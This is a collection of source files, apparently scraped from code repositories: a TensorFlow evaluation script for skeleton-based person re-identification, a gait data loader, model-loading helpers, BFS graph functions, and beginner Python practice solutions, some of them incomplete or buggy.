permutation_test_flag = False
permutation_test_2_flag = False
permutation = 0
test_permutation = 0
test_2_permutation = 0
Reverse = True
use_attention = True
Bi_LSTM = False
AGEs = True
Frozen = False
# Keep all following default parameters unchanged to evaluate the best model
tf.app.flags.DEFINE_string('attention', 'LA', "(LA) Locality-oriented Attention Alignment or BA (Basic Attention Alignment)")
tf.app.flags.DEFINE_string('manner', 'ap', "average prediction (ap) or sequence-level concatenation (sc)")
tf.app.flags.DEFINE_string('dataset', 'BIWI', "Dataset: BIWI or IAS or KGBD")
tf.app.flags.DEFINE_string('length', '6', "4, 6, 8 or 10")
tf.app.flags.DEFINE_string('gpu', '0', "GPU number")
tf.app.flags.DEFINE_string('frozen', '0', "Freeze CAGEs for contrastive learning")
tf.app.flags.DEFINE_string('c_reid', '0', "Peform re-id use projection vectors")
tf.app.flags.DEFINE_string('t', '0.05', "Temperature for contrastive learning")
tf.app.flags.DEFINE_string('train_flag', '1', "Choose to train (1) or test (0)")
tf.app.flags.DEFINE_string('view', 'None', "Choose different views for KS20")
tf.app.flags.DEFINE_string('transfer', 'None', "Choose a dataset's encoding model to transfer encoding")
tf.app.flags.DEFINE_string('best_model', 'rev_rec', "rev_rec (Rev. Rec.) or rev_rec_plus(Rev. Rec. Plus)")
tf.app.flags.DEFINE_string('RN_dir', 'None', "Choose the model directory to evaluate")
FLAGS = tf.app.flags.FLAGS
config = tf.ConfigProto()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
temperature = 0.1
config.gpu_options.allow_growth = True
view = 'view_'
transfer = 'None'
Model = 'rev_rec'
IAS_test = 'A'
RN_dir = 'None'
def main(_):
global attention, dataset, series_length, epochs, time_steps, gpu, manner, frames_ps, \
temperature, Frozen, C_reid, temperature, train_flag, view, use_attention, transfer, Model, IAS_test
attention, dataset, gpu, manner, length, Frozen, C_reid, temperature, train_flag, view_num, transfer, Model, RN_dir = FLAGS.attention, \
FLAGS.dataset, FLAGS.gpu, FLAGS.manner, \
FLAGS.length, FLAGS.frozen, FLAGS.c_reid, \
FLAGS.t, FLAGS.train_flag, FLAGS.view, FLAGS.transfer, FLAGS.best_model, FLAGS.RN_dir
# Choose different datasets and models (Rev. Reconstruction or Rev. Reconstruction++) to evaluate
if dataset not in ['BIWI', 'IAS', 'KGBD', 'KS20']:
raise Exception('Dataset must be BIWI, IAS, KGBD, or KS20.')
if Model not in ['prediction', 'sorting', 'rev_rec', 'rev_rec_plus']:
raise Exception('Model must be rev_rec or rev_rec_plus')
# Keep all following default parameters unchanged to evaluate the best model
if attention not in ['BA', 'LA']:
raise Exception('Attention must be BA or LA.')
if manner not in ['sc', 'ap']:
raise Exception('Training manner must be sc or ap.')
if not gpu.isdigit() or int(gpu) < 0:
raise Exception('GPU number must be a positive integer.')
if length not in ['4', '6', '8', '10']:
raise Exception('Length number must be 4, 6, 8 or 10.')
if Frozen not in ['0', '1']:
raise Exception('Frozen state must be 0 or 1.')
if C_reid not in ['0', '1']:
raise Exception('C_reid state must be 0 or 1.')
if train_flag not in ['0', '1', '2']:
raise Exception('Train_flag must be 0, 1 or 2 (Only evaluation).')
if view_num not in ['0', '1', '2', '3', '4', 'None']:
raise Exception('View_num must be 0, 1, 2, 3, 4 or None')
if transfer not in ['BIWI', 'IAS', 'KGBD', 'KS20', 'None']:
raise Exception('Transfer dataset must be BIWI, IAS, KGBD, KS20 or None')
os.environ['CUDA_VISIBLE_DEVICES'] = gpu
folder_name = dataset + '_' + attention
series_length = 20
if dataset == 'KS20':
series_length = 25
view += view_num
if view_num == 'None':
view = ''
if transfer != 'None':
train_flag = '0'
time_steps = int(length)
temperature = float(temperature)
frames_ps = dataset + '/' + str(time_steps) + '/'
epochs = 400
if dataset != 'KS20':
view = ''
if dataset == 'KGBD':
temperature = 0.5
else:
temperature = 0.1
# Rev. Reconstruction
if RN_dir == 'None':
print(
            ' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Temperature: %s\n ## Pretext Task: %s\n ## GPU: %s\n' %
(dataset, attention, manner, str(time_steps), str(temperature), Model, str(gpu)))
if Model == 'rev_rec':
if dataset == 'IAS':
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS-A_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS-B_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_' + attention + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
# Rev. Reconstruction ++
elif Model == 'rev_rec_plus':
if dataset == 'IAS':
try:
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS-A' + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS-B' + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
except:
IAS_test = 'A'
evaluate_reid('./Models/CAGEs_RN_models/IAS' + '_BA_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
IAS_test = 'B'
evaluate_reid(
'./Models/CAGEs_RN_models/IAS' + '_BA_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view+ 'pre_' + Model)
else:
evaluate_reid(
'./Models/CAGEs_RN_models/' + dataset + '_RN_' + manner + '_' + str(time_steps)
+ '_' + str(temperature) + '_' + Frozen + view + 'pre_' + Model)
else:
try:
settings = RN_dir.split('_')
dataset, attention, manner, time_steps, temperature = settings[0], settings[1], settings[3], int(settings[4]), float(settings[5])
settings = RN_dir.split('pre_')
Model = settings[1]
            print(' ## Dataset: %s\n ## Attention: %s\n ## Re-ID Manner: %s\n ## Sequence Length: %s\n ## Temperature: %s\n ## Pretext Task: %s\n' %
(dataset, attention, manner, str(time_steps), str(temperature), Model))
evaluate_reid('./Models/CAGEs_RN_models/' + RN_dir)
except:
print('Running failed. Please check out your parameters.')
def get_new_train_batches(targets, sources, batch_size):
if len(targets) < batch_size:
yield targets, sources
else:
for batch_i in range(0, len(sources) // batch_size):
start_i = batch_i * batch_size
sources_batch = sources[start_i:start_i + batch_size]
targets_batch = targets[start_i:start_i + batch_size]
yield targets_batch, sources_batch
def evaluate_reid(model_dir):
# print('Print the Validation Loss and Rank-1 Accuracy for each testing bacth: ')
global batch_size, dataset, manner, IAS_test
X = np.load(model_dir + '/val_X.npy')
y = np.load(model_dir + '/val_y.npy')
print(X.shape, y.shape)
if dataset == 'IAS':
X_2 = np.load(model_dir + '/val_2_X.npy')
y_2 = np.load(model_dir + '/val_2_y.npy')
if dataset == 'BIWI':
classes = [i for i in range(28)]
elif dataset == 'KGBD':
classes = [i for i in range(164)]
elif dataset == 'IAS':
classes = [i for i in range(11)]
elif dataset == 'KinectReID':
classes = [i for i in range(71)]
elif dataset == 'KS20':
classes = [i for i in range(20)]
checkpoint = model_dir + "/trained_model.ckpt"
loaded_graph = tf.get_default_graph()
from sklearn.preprocessing import label_binarize
from sklearn.metrics import roc_curve, auc, confusion_matrix
nAUC = 0
def cal_AUC(score_y, pred_y, ps, draw_pic=False):
score_y = np.array(score_y)
pred_y = label_binarize(np.array(pred_y), classes=classes)
# Compute micro-average ROC curve and ROC area
fpr, tpr, thresholds = roc_curve(pred_y.ravel(), score_y.ravel())
roc_auc = auc(fpr, tpr)
y_true = np.argmax(pred_y, axis=-1)
y_pred = np.argmax(score_y, axis=-1)
print('\n### Re-ID Confusion Matrix: ')
print(confusion_matrix(y_true, y_pred))
return roc_auc
if draw_pic:
fig = plt.figure()
lw = 2
plt.plot(fpr, tpr, color='darkorange',
lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic: ' + ps)
plt.legend(loc="lower right")
fig.savefig('30 epoch ROC')
plt.close()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint + '.meta')
loader.restore(sess, checkpoint)
X_input = loaded_graph.get_tensor_by_name('X_input:0')
y_input = loaded_graph.get_tensor_by_name('y_input:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
pred = loaded_graph.get_tensor_by_name('add_1:0')
cost = loaded_graph.get_tensor_by_name('new_train/Mean:0')
accuracy = loaded_graph.get_tensor_by_name('new_train/Mean_1:0')
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
Rank_1 = 0
if (dataset == 'IAS' and IAS_test == 'A') or dataset != 'IAS':
if dataset == 'IAS':
print('### Validation Results on IAS-A: ')
if manner == 'sc':
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
print(
                        'Testing Batch: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
.format(cnt,
loss,
acc,
))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y, X, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
all_frame_preds.extend(pre)
accs.append(acc)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y[k * time_steps: (k + 1) * time_steps], axis=1)
# print(sequence_labels)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
Rank_1 = seq_acc_t
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds,pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
if dataset == 'IAS' and IAS_test == 'B':
print('### Validation Results on IAS-B: ')
# IAS-B
if manner == 'sc':
correct_num = 0
total_num = 0
rank_acc = {}
ys = []
preds = []
accs = []
cnt = 0
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
cnt += 1
for i in range(y_batch.shape[0]):
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(pre[i], -K)[-K:]
if np.argmax(y_batch[i]) in t:
rank_acc[K] += 1
correct_num += acc * batch_size
total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
for K in rank_acc.keys():
rank_acc[K] /= total_num
total_acc = correct_num / total_num
Rank_1 = total_acc
# print('Rank-1 Accuracy: %f' % total_acc)
nAUC = cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
else:
all_frame_preds = []
for batch_i, (y_batch, X_batch) in enumerate(
get_new_train_batches(y_2, X_2, batch_size)):
loss, acc, pre = sess.run([cost, accuracy, pred],
{X_input: X_batch,
y_input: y_batch,
lr: learning_rate})
ys.extend(y_batch.tolist())
preds.extend(pre.tolist())
accs.append(acc)
all_frame_preds.extend(pre)
cnt += 1
# for i in range(y_batch.shape[0]):
# for K in range(1, len(classes) + 1):
# if K not in rank_acc.keys():
# rank_acc[K] = 0
# t = np.argpartition(pre[i], -K)[-K:]
# if np.argmax(y_batch[i]) in t:
# rank_acc[K] += 1
# # correct_num += acc * batch_size
# total_num += batch_size
# print(
# 'Testing Bacth: {:>3} - Validation Loss: {:>6.3f} - Validation Rank-1 Accuracy {:>6.3f}'
# .format(cnt,
# loss,
# acc,
# ))
# for K in rank_acc.keys():
# rank_acc[K] /= total_num
sequence_pred_correct = 0
sequence_num = 0
sequence_preds = []
sequence_ys = []
rank_acc = {}
for k in range(len(all_frame_preds) // time_steps):
sequence_labels = np.argmax(y_2[k * time_steps: (k + 1) * time_steps], axis=1)
if (sequence_labels == np.tile(sequence_labels[0], [sequence_labels.shape[0]])).all():
frame_predictions = np.array(all_frame_preds[k * time_steps: (k + 1) * time_steps])
sequence_pred = np.argmax(np.average(frame_predictions, axis=0))
temp_pred = np.average(frame_predictions, axis=0)
for K in range(1, len(classes) + 1):
if K not in rank_acc.keys():
rank_acc[K] = 0
t = np.argpartition(temp_pred, -K)[-K:]
if sequence_labels[0] in t:
rank_acc[K] += 1
if sequence_pred == sequence_labels[0]:
sequence_pred_correct += 1
sequence_num += 1
sequence_ys.append(sequence_labels[0])
aver = np.average(frame_predictions, axis=0)
sequence_preds.append(aver)
for K in rank_acc.keys():
rank_acc[K] /= sequence_num
seq_acc_t = sequence_pred_correct / sequence_num
Rank_1 = seq_acc_t
# total_acc = correct_num / total_num
# print('(Frame) Rank-1 Accuracy: %f' % total_acc)
# print('Rank-1 Accuracy: %f' % seq_acc_t)
sequence_ys = label_binarize(sequence_ys, classes=classes)
# cal_AUC(score_y=preds, pred_y=ys, ps='nAUC')
nAUC = cal_AUC(score_y=sequence_preds, pred_y=sequence_ys, ps='nAUC')
print('### Rank-n Accuracy: ')
print(rank_acc)
print('### Rank-1 Accuracy: %f' % Rank_1)
print('### nAUC: ' + str(nAUC))
if __name__ == '__main__':
tf.app.run()
``` |
{
"source": "1suancaiyu/STEP",
"score": 2
} |
#### File: classifier_stgcn_real_and_synth/utils/loader.py
```python
import h5py
import os
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
from utils import common
# torch
import torch
from torchvision import datasets, transforms
def load_data(_path, _ftype_real, _ftype_synth, coords, joints, cycles=3):
file_feature_real = os.path.join(_path, 'features' + _ftype_real + '.h5')
ffr = h5py.File(file_feature_real, 'r')
file_label_real = os.path.join(_path, 'labels' + _ftype_real + '.h5')
flr = h5py.File(file_label_real, 'r')
file_feature_synth = os.path.join(_path, 'features' + _ftype_synth + '.h5')
ffs = h5py.File(file_feature_synth, 'r')
file_label_synth = os.path.join(_path, 'labels' + _ftype_synth + '.h5')
fls = h5py.File(file_label_synth, 'r')
data_list = []
num_samples_real = len(ffr.keys())
num_samples_synth = len(ffs.keys())
num_samples = num_samples_real + num_samples_synth
time_steps = 0
labels_real = np.empty(num_samples_real)
labels_synth = np.empty(num_samples_synth)
for si in range(num_samples_real):
ffr_group_key = list(ffr.keys())[si]
data_list.append(list(ffr[ffr_group_key])) # Get the data
time_steps_curr = len(ffr[ffr_group_key])
if time_steps_curr > time_steps:
time_steps = time_steps_curr
labels_real[si] = flr[list(flr.keys())[si]][()]
for si in range(num_samples_synth):
ffs_group_key = list(ffs.keys())[si]
data_list.append(list(ffs[ffs_group_key])) # Get the data
time_steps_curr = len(ffs[ffs_group_key])
if time_steps_curr > time_steps:
time_steps = time_steps_curr
labels_synth[si] = fls[list(fls.keys())[si]][()]
labels = np.concatenate((labels_real, labels_synth), axis=0)
    # pad every sample by tiling its frames up to the longest sequence, repeated for `cycles` passes
    data = np.empty((num_samples, time_steps*cycles, joints*coords))
for si in range(num_samples):
data_list_curr = np.tile(data_list[si], (int(np.ceil(time_steps / len(data_list[si]))), 1))
for ci in range(cycles):
data[si, time_steps * ci:time_steps * (ci + 1), :] = data_list_curr[0:time_steps]
data = common.get_affective_features(np.reshape(data, (data.shape[0], data.shape[1], joints, coords)))[:, :, :48]
data_train, data_test, labels_train, labels_test = train_test_split(data, labels, test_size=0.1)
return data, labels, data_train, labels_train, data_test, labels_test
def scale(_data):
data_scaled = _data.astype('float32')
data_max = np.max(data_scaled)
data_min = np.min(data_scaled)
data_scaled = (_data-data_min)/(data_max-data_min)
return data_scaled, data_max, data_min
# descale generated data
def descale(data, data_max, data_min):
data_descaled = data*(data_max-data_min)+data_min
return data_descaled
def to_categorical(y, num_classes):
""" 1-hot encodes a tensor """
return np.eye(num_classes, dtype='uint8')[y]
class TrainTestLoader(torch.utils.data.Dataset):
def __init__(self, data, label, joints, coords, num_classes):
# data: N C T J
self.data = np.reshape(data, (data.shape[0], data.shape[1], joints, coords, 1))
self.data = np.moveaxis(self.data, [1, 2, 3], [2, 3, 1])
# load label
self.label = label
self.N, self.C, self.T, self.J, self.M = self.data.shape
def __len__(self):
return len(self.label)
def __getitem__(self, index):
# get data
data_numpy = np.array(self.data[index])
label = self.label[index]
# processing
# if self.random_choose:
# data_numpy = tools.random_choose(data_numpy, self.window_size)
# elif self.window_size > 0:
# data_numpy = tools.auto_pading(data_numpy, self.window_size)
# if self.random_move:
# data_numpy = tools.random_move(data_numpy)
return data_numpy, label
``` |
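A rough usage sketch for the loader above; the sample count, frame count, joint count and class count below are placeholder assumptions, and the random arrays stand in for what `load_data` would actually return from the h5 files.
```python
import numpy as np
from torch.utils.data import DataLoader

joints, coords, num_classes = 16, 3, 4
# stand-ins for the arrays load_data() would return
fake_data = np.random.rand(8, 30, joints * coords).astype('float32')
fake_labels = np.random.randint(0, num_classes, size=8)

dataset = TrainTestLoader(fake_data, fake_labels, joints, coords, num_classes)
loader = DataLoader(dataset, batch_size=4, shuffle=True)

for x, y in loader:
    # x: (batch, coords, frames, joints, 1) after the reshape/moveaxis in __init__
    print(x.shape, y.shape)
    break
```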
{
"source": "1suancaiyu/take_an_emotion_walk",
"score": 2
} |
#### File: take_an_emotion_walk/models/model_loader.py
```python
import sys
import torch
## default weights paths
DGNN_WEIGHTS_PATH = "weights/dgnn_weights.pt"
STGCN_WEIGHTS_PATH = "weights/stgcn_500_5.pt"
def load_stgcn(weights_path=STGCN_WEIGHTS_PATH):
    print("Loading stgcn...")
    sys.path.append("models/stgcn/")
    import st_gcn
    model = st_gcn.Model(3, 4, [])
    model.load_state_dict(torch.load(weights_path))
    model.cuda()
    model.double()
    return model
def load_dgnn(weights_path=DGNN_WEIGHTS_PATH):
    print("Loading dgnn...")
    sys.path.append("models/dgnn/")
    import dgnn
    model = dgnn.Model()
    model.cuda()
    model.load_state_dict(torch.load(weights_path))
    return model
# def load_taew(weights_path):
# TODO
# print("Loading taew...")
# sys.path.append("models/taew/")
# import hap
# model = hap.HAPPY()
# model.cuda()
# loaded_vars = torch.load(weights_path)
# model.load_state_dict(loaded_vars['model_dict'])
# model_GRU_h_enc = loaded_vars['h_enc']
# model_GRU_h_dec1 = loaded_vars['h_dec1']
# model_GRU_h_dec = loaded_vars['h_dec']
# return model
``` |
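A minimal, hedged usage sketch: it assumes a CUDA device is available, that the weight files exist at the default paths above, and that `models/stgcn/st_gcn.py` is laid out as the repo expects.
```python
# illustrative only; does not run a forward pass, just loads and inspects the model
if __name__ == "__main__":
    stgcn = load_stgcn(STGCN_WEIGHTS_PATH)
    stgcn.eval()  # inference mode for evaluation
    n_params = sum(p.numel() for p in stgcn.parameters())
    print("ST-GCN loaded with {} parameters".format(n_params))
```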
{
"source": "1tanwang/graph-and-graph-algorithms",
"score": 4
} |
#### File: algorithms/bfs-dfs/BFS.py
```python
from graph import Graph, read_adj_list
def bfs_shortest_path(graph, start, goal):
queue = [(start, [start])]
while queue:
(vertex, path) = queue.pop(0)
for next in set(graph.get_neighbors(vertex)) - set(path):
if next == goal:
return path + [next]
else:
queue.append((next, path + [next]))
return "no path from {} to {}".format(start, goal)
def bfs_connected_components(graph, start):
    queue, visited = [start], set()
    while queue:
        vertex = queue.pop(0)
        if vertex not in visited:
            visited.add(vertex)
            queue += set(graph.get_neighbors(vertex)) - visited
    return visited
``` |
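For a quick check without the repo's `graph` module, any object exposing the same `get_neighbors` interface works; the stand-in class and adjacency list below are made up for illustration.
```python
# minimal stand-in for the Graph class; only get_neighbors is needed by the helpers above
class DictGraph:
    def __init__(self, adj):
        self.adj = adj

    def get_neighbors(self, vertex):
        return self.adj.get(vertex, [])

g = DictGraph({
    'A': ['B', 'C'],
    'B': ['A', 'D'],
    'C': ['A', 'D'],
    'D': ['B', 'C', 'E'],
    'E': ['D'],
})

print(bfs_shortest_path(g, 'A', 'E'))    # e.g. ['A', 'B', 'D', 'E'] (set order may vary)
print(bfs_connected_components(g, 'A'))  # {'A', 'B', 'C', 'D', 'E'}
```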
{
"source": "1ta/study_python",
"score": 4
} |
#### File: sun/codingbat/logic_2.py
```python
def make_bricks(small, big, goal):
if goal > small + 5*big:
return False
if goal%5 <= small:
return True
else:
return False
def lone_sum(a, b, c):
sum = 0
if a != b and a != c: sum += a
if b != a and b != c: sum += b
if c != a and c != b: sum += c
return sum
def lucky_sum(a, b, c):
    # 13 is unlucky: it and any value to its right does not count toward the sum
    if a == 13:
        return 0
    if b == 13:
        return a
    if c == 13:
        return a + b
    return a + b + c
def make_chocolate(small, big, goal):
if goal > small + 5*big:
return -1
if goal%5 > small:
return -1
if goal/5 > big:
return goal-big*5
else:
return goal%5
```
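A few spot checks for the functions above, using the published CodingBat examples as expected values (run as a plain script).
```python
# quick sanity checks; expected values follow the standard CodingBat examples
if __name__ == "__main__":
    assert make_bricks(3, 1, 8)
    assert not make_bricks(3, 1, 9)
    assert lone_sum(1, 2, 3) == 6
    assert lone_sum(3, 2, 3) == 2
    assert make_chocolate(4, 1, 9) == 4
    assert make_chocolate(4, 1, 10) == -1
    print("all checks passed")
```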
#### File: sun/online_practice/remove_lianbiao.py
```python
class Solution:
"""
@param head: The first node of linked list.
@param n: An integer.
@return: The head of linked list.
"""
def removeNthFromEnd(self, head, n):
def findend(head):
end = head
count = 1
while end.next != None:
end = end.next
count = count+1
return count
def removenode(head,m):
if head.next is None:
return None
if m == 1 :
return head.next
current_no = 2
lh = head
lt = head
rh = head.next
while current_no < m:
lt = rh
rh = rh.next
current_no += 1
lt.next = rh.next
return head
l = findend(head)
m = l+1-n
r = removenode(head,m)
return r
```
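The solution relies on the judge's singly-linked-list node type; a minimal definition plus one round trip is enough to exercise it (the 5-element list and n=2 are just an example).
```python
# minimal node type matching what the solution expects (val / next attributes)
class ListNode:
    def __init__(self, val):
        self.val = val
        self.next = None

def build_list(values):
    dummy = ListNode(0)
    tail = dummy
    for v in values:
        tail.next = ListNode(v)
        tail = tail.next
    return dummy.next

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

head = build_list([1, 2, 3, 4, 5])
head = Solution().removeNthFromEnd(head, 2)  # drop the 2nd node from the end (the 4)
print(to_list(head))                         # [1, 2, 3, 5]
```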
#### File: sun/online_practice/subtree.py
```python
class Solution:
# @param T1, T2: The roots of binary tree.
# @return: True if T2 is a subtree of T1, or false.
def isSubtree(self, T1, T2):
# write your code here
        def match_tree(T1, T2):
            if T1 is None and T2 is None:
                return True
            if T1 is None or T2 is None:
                return False
            if T1.val != T2.val:
                return False
            return match_tree(T1.left, T2.left) and match_tree(T1.right, T2.right)
def subtree(T1, T2):
if T1 is None:
return False
# if T1.val == T2.val:
if match_tree(T1,T2):
return True
return subtree(T1.left,T2) or subtree(T1.right,T2)
if T2 is None:
return False
return subtree(T1,T2)
```
#### File: sun/practice/24dian.py
```python
import math
nums = input("Enter 4 numbers (separated by commas): ")
l=[]
for i in nums.split(","):
l.append(int(i))
def multiply(a,b):
return a*b
def plus(a,b):
return a+b
def minus(a,b):
return a-b
def divise(a,b):
return a*1.0/b
op = {
'*': multiply,
'+': plus,
'-': minus,
'/': divise
}
ops = ['*','+','-','/']
```
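The script stops after building the operator table and never searches for a solution. Below is a self-contained brute-force sketch of the missing search (it does not reuse the partial script above; the tolerance value and the pick-two-combine-recurse strategy are assumptions about how one might finish it).
```python
import itertools

EPS = 1e-6

def solve24(nums, target=24):
    """Return one expression string that reaches target, or None."""
    return _search([(float(n), str(n)) for n in nums], target)

def _search(items, target):
    if len(items) == 1:
        value, expr = items[0]
        return expr if abs(value - target) < EPS else None
    # pick an ordered pair, combine it with every operator, recurse on the reduced list
    for i, j in itertools.permutations(range(len(items)), 2):
        a, ea = items[i]
        b, eb = items[j]
        rest = [items[k] for k in range(len(items)) if k not in (i, j)]
        candidates = [(a + b, '({}+{})'.format(ea, eb)),
                      (a - b, '({}-{})'.format(ea, eb)),
                      (a * b, '({}*{})'.format(ea, eb))]
        if abs(b) > EPS:
            candidates.append((a / b, '({}/{})'.format(ea, eb)))
        for value, expr in candidates:
            found = _search(rest + [(value, expr)], target)
            if found:
                return found
    return None

print(solve24([4, 7, 8, 8]))  # e.g. ((7-(8/8))*4); exact form depends on search order
```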
#### File: sun/practice/binarytree(pre+in).py
```python
class Solution:
"""
@param preorder : A list of integers that preorder traversal of a tree
@param inorder : A list of integers that inorder traversal of a tree
@return : Root of a tree
"""
def buildTree(self, preorder, inorder):
def genTree(preorder,inorder):
if len(preorder)==0:
return None
root_val = preorder[0]
root = TreeNode(root_val)
n = inorder.index(root_val)
left_preorder = preorder[1:n+1]
left_inorder = inorder[:n]
right_preorder = preorder[n+1:]
right_inorder= inorder[n+1:]
if len(left_preorder) > 0:
root.left = genTree(left_preorder, left_inorder)
if len(right_preorder) > 0:
root.right = genTree(right_preorder, right_inorder)
return root
root = genTree(preorder, inorder)
return root
```
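`buildTree` assumes the judge's `TreeNode` template; a small self-contained check (the traversal lists below are an arbitrary example):
```python
# minimal node type matching the judge template the solution relies on
class TreeNode:
    def __init__(self, val):
        self.val = val
        self.left = None
        self.right = None

def postorder(root):
    if root is None:
        return []
    return postorder(root.left) + postorder(root.right) + [root.val]

root = Solution().buildTree(preorder=[3, 9, 20, 15, 7], inorder=[9, 3, 15, 20, 7])
print(postorder(root))  # [9, 15, 7, 20, 3] for this example
```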
#### File: sun/practice/large_4_num.py
```python
class Solution:
"""
    @param nums: A list of integers
    @return: An integer denoting the largest sum of 4 consecutive integers (the sum of all elements if fewer than 4)
"""
def maxSubArray(self, nums):
if len(nums)< 4:
return sum(nums)
else:
cache=[]
for i in range(len(nums)-3):
sum_num = nums[i]+nums[i+1]+nums[i+2]+nums[i+3]
cache.append(sum_num)
return max(cache)
print (Solution().maxSubArray([-1,4]))
```
#### File: sun/practice/longest_word_2.py
```python
class Solution:
# @param dictionary: a list of strings
# @return: a list of strings
def longestWords(self, dictionary):
cache = []
maxlength = 0
for word in dictionary:
l = len(word)
            if l > maxlength:
cache = []
maxlength = l
cache.append(word)
elif l == maxlength:
cache.append(word)
return cache
print(Solution().longestWords(["apped","apdoap","pajdnd","adjdnd"]))
```
#### File: sun/practice/longest_word.py
```python
class Solution:
# @param dictionary: a list of strings
# @return: a list of strings
def longestWords(self, dictionary):
def word_len_list(dictionary):
wd_list =[]
for word in dictionary:
wd_list.append(len(word))
return max(wd_list)
def find_word(dictionary):
result = []
for word in dictionary:
if len(word) == word_len_list(dictionary):
result.append(word)
return result
return find_word(dictionary)
print(Solution().longestWords(["apped","apdoap","pajdnd","adjdnd"]))
```
#### File: sun/practice/replace_blank.py
```python
class Solution:
# @param {char[]} string: An array of Char
# @param {int} length: The true length of the string
# @return {int} The true length of new string
def replaceBlank(self, string, length):
new_len = length
if string == None:
return None
for str_1 in string:
if str_1 == " ":
new_len += 2
for i in range(new_len):
if string[i] == " ":
string.remove(" ")
